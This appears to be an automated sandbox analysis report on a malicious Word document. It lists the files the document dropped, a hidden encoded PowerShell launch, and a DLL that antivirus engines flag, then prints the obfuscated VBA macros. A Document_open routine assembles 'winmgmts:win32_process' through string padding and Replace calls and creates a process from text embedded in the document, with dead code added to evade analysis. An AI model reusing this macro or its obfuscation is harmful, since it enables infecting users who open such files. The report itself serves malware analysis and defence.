                                                                                                                              MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                              SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                              SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                              SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                              Malicious:false
                                                                                                                              Preview: ....p.r.a.t.e.s.h.....
                                                                                                                              C:\Users\user\Desktop\~$2Pc0qA.doc.doc
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):162
                                                                                                                              Entropy (8bit):2.537027933460949
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Rl/ZdHpljlqKVCd9lqKJBZpMDZl:RtZBplUOCdKSBZpMDZl
                                                                                                                              MD5:62D2E9D0E5A00A4933B40C773F2A3521
                                                                                                                              SHA1:D129090958A7122B098FD1CDE5A80D5FF74E9CF5
                                                                                                                              SHA-256:61314B84034510BCE3DEF89D73551BE6385E9FF831736409B9A0843325927252
                                                                                                                              SHA-512:563CF8AA385591CCEAE68A2E3E61D0CC7E4567A7D0C6B11BFAAEE690569C1A0194D7CF1CFA18B9FD8BBE4A61DB1BDD3C52AD0A913FC5498F42E2CE36BEEF2D78
                                                                                                                              Malicious:false
                                                                                                                              Preview: .pratesh................................................p.r.a.t.e.s.h..........@q.............H.......6C.......@}.............T.......6C.......@y.......lpc......
                                                                                                                              C:\Users\user\Documents\20210201\PowerShell_transcript.724536.D_cV0UCD.20210201232511.txt
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):11663
                                                                                                                              Entropy (8bit):5.028707508716467
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:192:yS0NsjXDzcYlm8nuVF9M1GBgovhkssrx0DYQ4+B5mxEk:6kXDTUvhk7x0Dxlm1
                                                                                                                              MD5:870345A71AAB7D049F25966FF1779C26
                                                                                                                              SHA1:8BAE23F02C27D9A661D44B25584E5196752051AD
                                                                                                                              SHA-256:FCA635B949AAA3782CBD70493B1CBBF8CBBB1DB4D6183136DF335A615F081B09
                                                                                                                              SHA-512:A5BEADCAB0A2F4C1663830365F5940102F653202A14316E85A6A9AF9D3351D04045E8D9D354D82C39FD6AB942AF4BFDA04F78789D2B93B7A3A75E7ED9B9BD13E
                                                                                                                              Malicious:false
                                                                                                                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20210201232511..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 724536 (Microsoft Windows NT 10.0.17134.0)..Host Application: POwersheLL -w hidden -ENCOD [Base64-encoded command omitted]
                                                                                                                              C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):228352
                                                                                                                              Entropy (8bit):7.401227982577977
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3072:Q2JsbTQ7oRiTPy6758RAuiGsIwuVKiCJ0/ykN8t+XPjf7z3I43:Q2JCIoRSi1iGsuwfJ0KkU+XPjQ
                                                                                                                              MD5:1BCF5E93610C3774A59240E10932A252
                                                                                                                              SHA1:61D3C80B5E71F136E2D7039AA9D5F41E2595BBF0
                                                                                                                              SHA-256:F5736A1F0C40D3609BA0C394FE424795D71E19A6B57AB55CA9C6F49B79485C27
                                                                                                                              SHA-512:1D57B47A0134D09677AA18356A0A351D335414901BB8B35DA31ACFA43CFBB3F1C76ECEB14F98E915495ECB923BEA23C3F9BC5D711F041F44DCAD6142071B23F2
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              • Antivirus: Metadefender, Detection: 56%, Browse
                                                                                                                              • Antivirus: ReversingLabs, Detection: 96%

                                                                                                                              Static File Info

                                                                                                                              General

                                                                                                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: extensible Automotive generate withdrawal Wooden Global architecture, Author: Chlo Gerard, Template: Normal.dotm, Last Saved By: Thomas Roussel, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Dec 21 13:51:00 2020, Last Saved Time/Date: Mon Dec 21 13:51:00 2020, Number of Pages: 1, Number of Words: 5943, Number of Characters: 33877, Security: 8
                                                                                                                              Entropy (8bit):6.406111255633529
                                                                                                                              TrID:
                                                                                                                              • Microsoft Word document (32009/1) 54.23%
                                                                                                                              • Microsoft Word document (old ver.) (19008/1) 32.20%
                                                                                                                              • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
                                                                                                                              File name:v22Pc0qA.doc.doc
                                                                                                                              File size:207253
                                                                                                                              MD5:7a7d325948481b0557b035249bf5c96a
                                                                                                                              SHA1:0529727ffad8388fc94155d1652ca65189cda5df
                                                                                                                              SHA256:47e4926bc53fb131b2e976d7b1c2f4b3c0f665242aa493d7e21b4df773b60919
                                                                                                                              SHA512:45cf99bad712aaace79010c728705117fc12ac76d76f625716115a19477ce40de5d18ecaca8e84ea55c388d4436d4827ab63c660df86dcdc01c5c8ce975dda44
                                                                                                                              SSDEEP:3072:MD9ufstRUUKSns8T00JSHUgteMJ8qMD7g5bkxU7PoU2l65gsaTs:Y9ufsfgIf0pLkU7PoU2lIgsaTs

                                                                                                                              File Icon

                                                                                                                              Icon Hash:74f4c4c6c1cac4d8

                                                                                                                              Static OLE Info

                                                                                                                              General

                                                                                                                              Document Type:OLE
                                                                                                                              Number of OLE Files:1

                                                                                                                              OLE File "v22Pc0qA.doc.doc"

                                                                                                                              Indicators

                                                                                                                              Has Summary Info:True
                                                                                                                              Application Name:Microsoft Office Word
                                                                                                                              Encrypted Document:False
                                                                                                                              Contains Word Document Stream:True
                                                                                                                              Contains Workbook/Book Stream:False
                                                                                                                              Contains PowerPoint Document Stream:False
                                                                                                                              Contains Visio Document Stream:False
                                                                                                                              Contains ObjectPool Stream:
                                                                                                                              Flash Objects Count:
                                                                                                                              Contains VBA Macros:True

                                                                                                                              Summary

                                                                                                                              Code Page:1252
                                                                                                                              Title:
                                                                                                                              Subject:extensible Automotive generate withdrawal Wooden Global architecture
                                                                                                                              Author:Chlo Gerard
                                                                                                                              Keywords:
                                                                                                                              Comments:
                                                                                                                              Template:Normal.dotm
                                                                                                                              Last Saved By:Thomas Roussel
                                                                                                                              Revision Number:1
                                                                                                                              Total Edit Time:0
                                                                                                                              Create Time:2020-12-21 13:51:00
                                                                                                                              Last Saved Time:2020-12-21 13:51:00
                                                                                                                              Number of Pages:1
                                                                                                                              Number of Words:5943
                                                                                                                              Number of Characters:33877
                                                                                                                              Creating Application:Microsoft Office Word
                                                                                                                              Security:8

                                                                                                                              Document Summary

                                                                                                                              Document Code Page:1252
                                                                                                                              Number of Lines:282
                                                                                                                              Number of Paragraphs:79
                                                                                                                              Thumbnail Scaling Desired:False
                                                                                                                              Company:
                                                                                                                              Contains Dirty Links:False
                                                                                                                              Shared Document:False
                                                                                                                              Changed Hyperlinks:False
                                                                                                                              Application Version:983040

                                                                                                                              Streams with VBA

                                                                                                                              VBA File Name: UserForm1, Stream Size: -1
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm1
                                                                                                                              VBA File Name:UserForm1
                                                                                                                              Stream Size:-1
                                                                                                                              Data ASCII:
                                                                                                                              Data Raw:

                                                                                                                              VBA Code Keywords

                                                                                                                              Keyword
                                                                                                                              VB_Exposed
                                                                                                                              Attribute
                                                                                                                              VB_Name
                                                                                                                              VB_Creatable
                                                                                                                              VB_PredeclaredId
                                                                                                                              VB_GlobalNameSpace
                                                                                                                              VB_Base
                                                                                                                              VB_Customizable
                                                                                                                              False
                                                                                                                              VB_TemplateDerived
                                                                                                                              VBA Code
                                                                                                                              Attribute VB_Name = "UserForm1"
                                                                                                                              Attribute VB_Base = "0{E4811F3D-9F01-4BC4-95D4-D40026D931D3}{41345D1C-9C4E-4385-B780-C54CCB7ABE17}"
                                                                                                                              Attribute VB_GlobalNameSpace = False
                                                                                                                              Attribute VB_Creatable = False
                                                                                                                              Attribute VB_PredeclaredId = True
                                                                                                                              Attribute VB_Exposed = False
                                                                                                                              Attribute VB_TemplateDerived = False
                                                                                                                              Attribute VB_Customizable = False
                                                                                                                              VBA File Name: UserForm2, Stream Size: -1
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm2
                                                                                                                              VBA File Name:UserForm2
                                                                                                                              Stream Size:-1
                                                                                                                              Data ASCII:
                                                                                                                              Data Raw:

                                                                                                                              VBA Code Keywords

                                                                                                                              Keyword
                                                                                                                              False
                                                                                                                              VB_Exposed
                                                                                                                              Attribute
                                                                                                                              VB_Name
                                                                                                                              VB_Creatable
                                                                                                                              VB_PredeclaredId
                                                                                                                              VB_GlobalNameSpace
                                                                                                                              VB_Base
                                                                                                                              VB_Customizable
                                                                                                                              VB_TemplateDerived
                                                                                                                              VBA Code
                                                                                                                              Attribute VB_Name = "UserForm2"
                                                                                                                              Attribute VB_Base = "0{AF4533AC-BBF6-4979-BA91-9D2D4959595A}{3CF58CA5-D4D4-49F7-BA7F-F124E45D0A17}"
                                                                                                                              Attribute VB_GlobalNameSpace = False
                                                                                                                              Attribute VB_Creatable = False
                                                                                                                              Attribute VB_PredeclaredId = True
                                                                                                                              Attribute VB_Exposed = False
                                                                                                                              Attribute VB_TemplateDerived = False
                                                                                                                              Attribute VB_Customizable = False
                                                                                                                              VBA File Name: UserForm3, Stream Size: -1
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm3
                                                                                                                              VBA File Name:UserForm3
                                                                                                                              Stream Size:-1
                                                                                                                              Data ASCII:
                                                                                                                              Data Raw:

                                                                                                                              VBA Code Keywords

                                                                                                                              Keyword
                                                                                                                              False
                                                                                                                              VB_Exposed
                                                                                                                              Attribute
                                                                                                                              VB_Name
                                                                                                                              VB_Creatable
                                                                                                                              VB_PredeclaredId
                                                                                                                              VB_Base
                                                                                                                              VB_Customizable
                                                                                                                              VB_TemplateDerived
                                                                                                                              VB_GlobalNameSpace
                                                                                                                              VBA Code
                                                                                                                              Attribute VB_Name = "UserForm3"
                                                                                                                              Attribute VB_Base = "0{A4835EEF-81F1-4677-BAA3-01DF6CF2C26F}{ADE6D7C4-3411-4730-A534-6D8AAFEFBA8F}"
                                                                                                                              Attribute VB_GlobalNameSpace = False
                                                                                                                              Attribute VB_Creatable = False
                                                                                                                              Attribute VB_PredeclaredId = True
                                                                                                                              Attribute VB_Exposed = False
                                                                                                                              Attribute VB_TemplateDerived = False
                                                                                                                              Attribute VB_Customizable = False
                                                                                                                              VBA File Name: UserForm4, Stream Size: -1
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm4
                                                                                                                              VBA File Name:UserForm4
                                                                                                                              Stream Size:-1
                                                                                                                              Data ASCII:
                                                                                                                              Data Raw:

                                                                                                                              VBA Code Keywords

                                                                                                                              Keyword
                                                                                                                              False
                                                                                                                              VB_Exposed
                                                                                                                              Attribute
                                                                                                                              VB_Name
                                                                                                                              VB_Creatable
                                                                                                                              VB_PredeclaredId
                                                                                                                              VB_GlobalNameSpace
                                                                                                                              VB_Customizable
                                                                                                                              VB_TemplateDerived
                                                                                                                              VB_Base
                                                                                                                              VBA Code
                                                                                                                              Attribute VB_Name = "UserForm4"
                                                                                                                              Attribute VB_Base = "0{4FA002EA-017C-4E93-9C6B-22A1ABC6E370}{C27736E2-CDA0-4100-9FCF-E22B5D354CA0}"
                                                                                                                              Attribute VB_GlobalNameSpace = False
                                                                                                                              Attribute VB_Creatable = False
                                                                                                                              Attribute VB_PredeclaredId = True
                                                                                                                              Attribute VB_Exposed = False
                                                                                                                              Attribute VB_TemplateDerived = False
                                                                                                                              Attribute VB_Customizable = False
                                                                                                                              VBA File Name: UserForm5, Stream Size: -1
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm5
                                                                                                                              VBA File Name:UserForm5
                                                                                                                              Stream Size:-1
                                                                                                                              Data ASCII:
                                                                                                                              Data Raw:

                                                                                                                              VBA Code Keywords

                                                                                                                              Keyword
                                                                                                                              False
                                                                                                                              VB_Exposed
                                                                                                                              Attribute
                                                                                                                              VB_Name
                                                                                                                              VB_Creatable
                                                                                                                              VB_PredeclaredId
                                                                                                                              VB_GlobalNameSpace
                                                                                                                              VB_Base
                                                                                                                              VB_Customizable
                                                                                                                              VB_TemplateDerived
                                                                                                                              VBA Code
                                                                                                                              Attribute VB_Name = "UserForm5"
                                                                                                                              Attribute VB_Base = "0{B4698655-398F-452C-B828-35D501CBBA3E}{6D1A2E80-5267-422A-B1BA-58F578BA8D71}"
                                                                                                                              Attribute VB_GlobalNameSpace = False
                                                                                                                              Attribute VB_Creatable = False
                                                                                                                              Attribute VB_PredeclaredId = True
                                                                                                                              Attribute VB_Exposed = False
                                                                                                                              Attribute VB_TemplateDerived = False
                                                                                                                              Attribute VB_Customizable = False
                                                                                                                              VBA File Name: Dk5att0cu_9jsb, Stream Size: 1114
                                                                                                                              General
                                                                                                                              Stream Path:Macros/VBA/Dk5att0cu_9jsb
                                                                                                                              VBA File Name:Dk5att0cu_9jsb
                                                                                                                              Stream Size:1114

                                                                                                                              VBA Code Keywords

                                                                                                                              Keyword
                                                                                                                              False
                                                                                                                              Private
                                                                                                                              VB_Exposed
                                                                                                                              Attribute
                                                                                                                              VB_Creatable
                                                                                                                              VB_Name
                                                                                                                              Document_open()
                                                                                                                              VB_Customizable
                                                                                                                              VB_PredeclaredId
                                                                                                                              VB_GlobalNameSpace
                                                                                                                              VB_Base
                                                                                                                              VB_TemplateDerived
                                                                                                                              VBA Code
                                                                                                                              Attribute VB_Name = "Dk5att0cu_9jsb"
                                                                                                                              Attribute VB_Base = "1Normal.ThisDocument"
                                                                                                                              Attribute VB_GlobalNameSpace = False
                                                                                                                              Attribute VB_Creatable = False
                                                                                                                              Attribute VB_PredeclaredId = True
                                                                                                                              Attribute VB_Exposed = True
                                                                                                                              Attribute VB_TemplateDerived = True
                                                                                                                              Attribute VB_Customizable = True
                                                                                                                              Private Sub Document_open()
                                                                                                                              Joieredaxt98oc6o
                                                                                                                              End Sub
                                                                                                                              VBA File Name: Lxvinhyq0hu0i, Stream Size: 16887
                                                                                                                              General
                                                                                                                              Stream Path:Macros/VBA/Lxvinhyq0hu0i
                                                                                                                              VBA File Name:Lxvinhyq0hu0i
                                                                                                                              Stream Size:16887

                                                                                                                              VBA Code Keywords

                                                                                                                              Keyword
                                                                                                                              "cBBImVFtj.VfOyHcZeG.KTQGJQv"
                                                                                                                              MVKdEA
                                                                                                                              "iYrsMDeBF.SIoiFJ.zdnAB"
                                                                                                                              "cfmqZH.yHFfXEyD.iUezXEC"
                                                                                                                              TFhBESFIX
                                                                                                                              yqztDCl:
                                                                                                                              VBA.Replace
                                                                                                                              jSGTCFaK:
                                                                                                                              hVRJE
                                                                                                                              "HGXMmlZoZ.jEXaTVE.zeocvMGG"
                                                                                                                              RZyrFJ
                                                                                                                              sbVXlJE:
                                                                                                                              aDFRF
                                                                                                                              KAedr
                                                                                                                              "ObyEHIBL.hGKABcIQ.yeYrFAOmg"
                                                                                                                              RMyrFd
                                                                                                                              qLfbCLdC
                                                                                                                              GLxLQDxBB
                                                                                                                              KiOKSNEG:
                                                                                                                              PrigNJEs
                                                                                                                              nCWvB
                                                                                                                              RhecDCNb:
                                                                                                                              YaqiI
                                                                                                                              yDuIa
                                                                                                                              aDFRF:
                                                                                                                              Binary
                                                                                                                              hckCCJvD:
                                                                                                                              UbSMfKFUj
                                                                                                                              CtmaxWDYG
                                                                                                                              dcClB:
                                                                                                                              VipWJ:
                                                                                                                              jSGTCFaK
                                                                                                                              IpXGAFACy
                                                                                                                              jWIUH
                                                                                                                              yqztDCl
                                                                                                                              "aguCEDpx.XlUcBUj.UPogGhX"
                                                                                                                              "zSasAJg.LDOIU.vvZOFJ"
                                                                                                                              "AtMXEHJGF.tPVXDfJI.vNeXEIF"
                                                                                                                              wVgZExzI
                                                                                                                              "gtvUAW.KeNGGlEDI.FCFXBEHbH"
                                                                                                                              hkpqEBd
                                                                                                                              FEJNFPMF
                                                                                                                              uYPoFiE
                                                                                                                              XvETIO
                                                                                                                              pxMXSJrIc:
                                                                                                                              dcClB
                                                                                                                              VIuzQOE:
                                                                                                                              "zpGvEhCHv.ZNcWIJcU.qeFzJB"
                                                                                                                              "gEMlED.skZhEggk.ZyWBD"
                                                                                                                              FzSmxUBI:
                                                                                                                              IIJMEYBZ
                                                                                                                              JubeVI
                                                                                                                              "QWkiJ.sNlBSC.hsUWFP"
                                                                                                                              BRfTAJ
                                                                                                                              lOYxmwBA
                                                                                                                              IIJMEYBZ:
                                                                                                                              UFEneAQF
                                                                                                                              FzOAw
                                                                                                                              "eKLzaJBKG.eCACJBH.NfdiGiC"
                                                                                                                              Resume
                                                                                                                              iAKfBEDC:
                                                                                                                              QqQRUOBIy
                                                                                                                              "nRpjIJ.tkIcCAbCF.hJzbH"
                                                                                                                              yHCsJFACD
                                                                                                                              lfjdHL
                                                                                                                              mxDIrHC
                                                                                                                              hckCCJvD
                                                                                                                              DxojDGC
                                                                                                                              rDIcxFB:
                                                                                                                              NwlcQEELI
                                                                                                                              eYojg
                                                                                                                              JXblRBK:
                                                                                                                              kaqktK
                                                                                                                              olbDbIA:
                                                                                                                              nCWvB:
                                                                                                                              "bfJqAKr.cLEdAF.oYWiAFEQ"
                                                                                                                              lbHAbDF:
                                                                                                                              ZqNrvaa:
                                                                                                                              kmOCpG
                                                                                                                              FoTWuD:
                                                                                                                              ChrW(wdKeyS)
                                                                                                                              bVAPDAD
                                                                                                                              "ZbLbn.FiqyBGPC.ROWoCHF"
                                                                                                                              cHoJJlDBJ
                                                                                                                              "CXrJJB.OBfnW.uqEngDYV"
                                                                                                                              "BpfOu.TVoTOHe.EzrPEDJ"
                                                                                                                              "rqFdfCgk.WuMsFCHq.wYpcBKVBP"
                                                                                                                              VBA Code
                                                                                                                              Attribute VB_Name = "Lxvinhyq0hu0i"
                                                                                                                                Function Gdxyahu7r2bnouqu(G_vsoyetocf_q1hwst)
                                                                                                                                 GoTo kmOCpG
                                                                                                                              Dim lfjdHL As String
                                                                                                                              Open "ZbLbn.FiqyBGPC.ROWoCHF" For Binary As 230
                                                                                                                              Put #230, , lfjdHL
                                                                                                                              Close #230
                                                                                                                              kmOCpG:
                                                                                                                              GoTo RhecDCNb
                                                                                                                              Dim GLxLQDxBB As String
                                                                                                                              Open "WWgXBJbAL.psfjJF.iosTZOn" For Binary As 176
                                                                                                                              Put #176, , GLxLQDxBB
                                                                                                                              Close #176
                                                                                                                              RhecDCNb:
                                                                                                                              GoTo iAKfBEDC
                                                                                                                              Dim eYojg As String
                                                                                                                              Open "eKLzaJBKG.eCACJBH.NfdiGiC" For Binary As 76
                                                                                                                              Put #76, , eYojg
                                                                                                                              Close #76
                                                                                                                              iAKfBEDC:
                                                                                                                              Gdxyahu7r2bnouqu = VBA.Replace (G_vsoyetocf_q1hwst, "J" + ")(3" + "s2)" + "(", H9dyim0o_e1y2ad)
                                                                                                                                 GoTo PksXIAC
                                                                                                                              Dim bVAPDAD As String
                                                                                                                              Open "YNveE.qehAq.fHHuGb" For Binary As 214
                                                                                                                              Put #214, , bVAPDAD
                                                                                                                              Close #214
                                                                                                                              PksXIAC:
                                                                                                                              GoTo hckCCJvD
                                                                                                                              Dim oVlMEI As String
                                                                                                                              Open "UqHHHBQRG.wPBFeBYHC.BFGBerA" For Binary As 203
                                                                                                                              Put #203, , oVlMEI
                                                                                                                              Close #203
                                                                                                                              hckCCJvD:
                                                                                                                              GoTo IaIuovC
                                                                                                                              Dim HMJCGGAMi As String
                                                                                                                              Open "ObyEHIBL.hGKABcIQ.yeYrFAOmg" For Binary As 100
                                                                                                                              Put #100, , HMJCGGAMi
                                                                                                                              Close #100
                                                                                                                              IaIuovC:
                                                                                                                              End Function
                                                                                                                              Function Joieredaxt98oc6o()
                                                                                                                              On Error Resume Next
                                                                                                                              mn2b = Dk5att0cu_9jsb.StoryRanges.Item(1)
                                                                                                                                 GoTo nmHtBKNIA
                                                                                                                              Dim kaqktK As String
                                                                                                                              Open "fNHCB.hbEBBG.feKiwC" For Binary As 221
                                                                                                                              Put #221, , kaqktK
                                                                                                                              Close #221
                                                                                                                              nmHtBKNIA:
                                                                                                                              GoTo MVKdEA
                                                                                                                              Dim RZyrFJ As String
                                                                                                                              Open "cklcdFF.ljzQFAII.yhDYGICo" For Binary As 166
                                                                                                                              Put #166, , RZyrFJ
                                                                                                                              Close #166
                                                                                                                              MVKdEA:
                                                                                                                              GoTo lfRjBXXFA
                                                                                                                              Dim yJzxGZak As String
                                                                                                                              Open "KeuGF.APuwUHxl.GiUhBFB" For Binary As 105
                                                                                                                              Put #105, , yJzxGZak
                                                                                                                              Close #105
                                                                                                                              lfRjBXXFA:
                                                                                                                              mwb2 = "J)(3s2)(pJ)(3s2)("
                                                                                                                              Uytq7q8qmjumesrn6n = "J)(3" + "s2)(roJ)(3s2" + ")(J)(3s2)(ceJ)(3s2" + ")(sJ)(3s2)(sJ)(3s" + "2)(J)(3s2)("
                                                                                                                                 GoTo FzSmxUBI
                                                                                                                              Dim JubeVI As String
                                                                                                                              Open "NhKID.SYBhRIEGg.qCLeaM" For Binary As 150
                                                                                                                              Put #150, , JubeVI
                                                                                                                              Close #150
                                                                                                                              FzSmxUBI:
                                                                                                                              GoTo cIiApH
                                                                                                                              Dim JKIoD As String
                                                                                                                              Open "dZEvHBM.HWisMo.kLMoA" For Binary As 143
                                                                                                                              Put #143, , JKIoD
                                                                                                                              Close #143
                                                                                                                              cIiApH:
                                                                                                                              GoTo olbDbIA
                                                                                                                              Dim QyqGnByH As String
                                                                                                                              Open "NPkiDT.CkfBJvJ.bgnwZAB" For Binary As 115
                                                                                                                              Put #115, , QyqGnByH
                                                                                                                              Close #115
                                                                                                                              olbDbIA:
                                                                                                                              Po2ytmcrm_ypc = "J)(3s2)(" + ":wJ)(3s2)(J)(3s" + "2)(inJ)(3s2)(3J)(" + "3s2)(2J)(3s2)(_J)(3s2)("
                                                                                                                                 GoTo jJMCQJDB
                                                                                                                              Dim PrigNJEs As String
                                                                                                                              Open "BpfOu.TVoTOHe.EzrPEDJ" For Binary As 188
                                                                                                                              Put #188, , PrigNJEs
                                                                                                                              Close #188
                                                                                                                              jJMCQJDB:
                                                                                                                              GoTo yDuIa
                                                                                                                              Dim KAedr As String
                                                                                                                              Open "pJlGBGe.jIXSWL.jkAfAEIf" For Binary As 255
                                                                                                                              Put #255, , KAedr
                                                                                                                              Close #255
                                                                                                                              yDuIa:
                                                                                                                              GoTo fGzqP
                                                                                                                              Dim EiViHgGI As String
                                                                                                                              Open "pPiJFZzI.dfizGxy.NRcSrA" For Binary As 101
                                                                                                                              Put #101, , EiViHgGI
                                                                                                                              Close #101
                                                                                                                              fGzqP:
                                                                                                                              E4yx9bkuv6v1jxlzz = "wJ)(3s2)(i" + "nJ)(3s2)(mJ)(3s2)(gmJ)(3" + "s2)(tJ)(3s2)(J)(3s2)("
                                                                                                                                 GoTo YEAwF
                                                                                                                              Dim kySRBFED As String
                                                                                                                              Open "OqezBEGR.dKnPpE.XZiNID" For Binary As 184
                                                                                                                              Put #184, , kySRBFED
                                                                                                                              Close #184
                                                                                                                              YEAwF:
                                                                                                                              GoTo jWIUH
                                                                                                                              Dim wVgZExzI As String
                                                                                                                              Open "WWmJGCEWG.XCrNGJ.ficHzH" For Binary As 234
                                                                                                                              Put #234, , wVgZExzI
                                                                                                                              Close #234
                                                                                                                              jWIUH:
                                                                                                                              GoTo XvETIO
                                                                                                                              Dim FzOAw As String
                                                                                                                              Open "iYrsMDeBF.SIoiFJ.zdnAB" For Binary As 173
                                                                                                                              Put #173, , FzOAw
                                                                                                                              Close #173
                                                                                                                              XvETIO:
                                                                                                                              Aaq271x4j__7dcviuj = ChrW(wdKeyS)
                                                                                                                                 GoTo qLfbCLdC
                                                                                                                              Dim SEnkGD As String
                                                                                                                              Open "zSasAJg.LDOIU.vvZOFJ" For Binary As 233
                                                                                                                              Put #233, , SEnkGD
                                                                                                                              Close #233
                                                                                                                              qLfbCLdC:
                                                                                                                              GoTo yqztDCl
                                                                                                                              Dim AJXECAN As String
                                                                                                                              Open "cBBImVFtj.VfOyHcZeG.KTQGJQv" For Binary As 256
                                                                                                                              Put #256, , AJXECAN
                                                                                                                              Close #256
                                                                                                                              yqztDCl:
                                                                                                                              GoTo yDAMCG
                                                                                                                              Dim zoqaA As String
                                                                                                                              Open "AtMXEHJGF.tPVXDfJI.vNeXEIF" For Binary As 212
                                                                                                                              Put #212, , zoqaA
                                                                                                                              Close #212
                                                                                                                              yDAMCG:
                                                                                                                              Av35ujjoujldl9 = E4yx9bkuv6v1jxlzz + Aaq271x4j__7dcviuj + Po2ytmcrm_ypc + mwb2 + Uytq7q8qmjumesrn6n
                                                                                                                                 GoTo hVRJE
                                                                                                                              Dim IGamxCG As String
                                                                                                                              Open "zpGvEhCHv.ZNcWIJcU.qeFzJB" For Binary As 161
                                                                                                                              Put #161, , IGamxCG
                                                                                                                              Close #161
                                                                                                                              hVRJE:
                                                                                                                              GoTo VIuzQOE
                                                                                                                              Dim JxVVF As String
                                                                                                                              Open "aguCEDpx.XlUcBUj.UPogGhX" For Binary As 208
                                                                                                                              Put #208, , JxVVF
                                                                                                                              Close #208
                                                                                                                              VIuzQOE:
                                                                                                                              GoTo jSGTCFaK
                                                                                                                              Dim lOYxmwBA As String
                                                                                                                              Open "ErIlZF.tHbIE.idUJKwuOi" For Binary As 110
                                                                                                                              Put #110, , lOYxmwBA
                                                                                                                              Close #110
                                                                                                                              jSGTCFaK:
                                                                                                                              Xyc25um2qhx = Us5rvv097omc6(Av35ujjoujldl9)
                                                                                                                                 GoTo lbHAbDF
                                                                                                                              Dim iZGGBKjGH As String
                                                                                                                              Open "uozeDEQ.xTczzpJbJ.GKYoFkDTH" For Binary As 135
                                                                                                                              Put #135, , iZGGBKjGH
                                                                                                                              Close #135
                                                                                                                              lbHAbDF:
                                                                                                                              GoTo nhVWCG
                                                                                                                              Dim cHoJJlDBJ As String
                                                                                                                              Open "oScEJFIH.GpYhI.ZPvpk" For Binary As 150
                                                                                                                              Put #150, , cHoJJlDBJ
                                                                                                                              Close #150
                                                                                                                              nhVWCG:
                                                                                                                              GoTo TFhBESFIX
                                                                                                                              Dim OXtlEDLCd As String
                                                                                                                              Open "gjoHAq.pgiDH.iYppCzD" For Binary As 165
                                                                                                                              Put #165, , OXtlEDLCd
                                                                                                                              Close #165
                                                                                                                              TFhBESFIX:
                                                                                                                              Set Tbkimf15gklpyjuc5 = CreateObject(Xyc25um2qhx)
                                                                                                                                 GoTo dcClB
                                                                                                                              Dim uYPoFiE As String
                                                                                                                              Open "TNqlmI.VQzWNlJC.IuleF" For Binary As 98
                                                                                                                              Put #98, , uYPoFiE
                                                                                                                              Close #98
                                                                                                                              dcClB:
                                                                                                                              GoTo sbVXlJE
                                                                                                                              Dim YaqiI As String
                                                                                                                              Open "QWkiJ.sNlBSC.hsUWFP" For Binary As 145
                                                                                                                              Put #145, , YaqiI
                                                                                                                              Close #145
                                                                                                                              sbVXlJE:
                                                                                                                              GoTo UbSMfKFUj
                                                                                                                              Dim BRfTAJ As String
                                                                                                                              Open "rqFdfCgk.WuMsFCHq.wYpcBKVBP" For Binary As 236
                                                                                                                              Put #236, , BRfTAJ
                                                                                                                              Close #236
                                                                                                                              UbSMfKFUj:
                                                                                                                              U4fasjmuqzl8g4y9 = Mid(mn2b, (5), Len(mn2b))
                                                                                                                                 GoTo FoTWuD
                                                                                                                              Dim hkpqEBd As String
                                                                                                                              Open "AcrzGL.zwvmHG.MqsxCr" For Binary As 213
                                                                                                                              Put #213, , hkpqEBd
                                                                                                                              Close #213
                                                                                                                              FoTWuD:
                                                                                                                              GoTo VipWJ
                                                                                                                              Dim GwJXIC As String
                                                                                                                              Open "XIjXFFFIJ.jYAPtLTyj.PLtLFT" For Binary As 165
                                                                                                                              Put #165, , GwJXIC
                                                                                                                              Close #165
                                                                                                                              VipWJ:
                                                                                                                              GoTo yHCsJFACD
                                                                                                                              Dim eTuZIDG As String
                                                                                                                              Open "MiwKq.hkWsDcI.YmoTAGR" For Binary As 135
                                                                                                                              Put #135, , eTuZIDG
                                                                                                                              Close #135
                                                                                                                              yHCsJFACD:
                                                                                                                                 GoTo FEJNFPMF
                                                                                                                              Dim UFEneAQF As String
                                                                                                                              Open "NgFRIFlFQ.imXZAJE.tzzlC" For Binary As 153
                                                                                                                              Put #153, , UFEneAQF
                                                                                                                              Close #153
                                                                                                                              FEJNFPMF:
                                                                                                                              GoTo rDIcxFB
                                                                                                                              Dim EhrmhuB As String
                                                                                                                              Open "RSIiW.JGdvBjSmB.WubTFJ" For Binary As 118
                                                                                                                              Put #118, , EhrmhuB
                                                                                                                              Close #118
                                                                                                                              rDIcxFB:
                                                                                                                              GoTo xuAPcBl
                                                                                                                              Dim mxDIrHC As String
                                                                                                                              Open "NipqJ.tIztQI.WMXjaJ" For Binary As 202
                                                                                                                              Put #202, , mxDIrHC
                                                                                                                              Close #202
                                                                                                                              xuAPcBl:
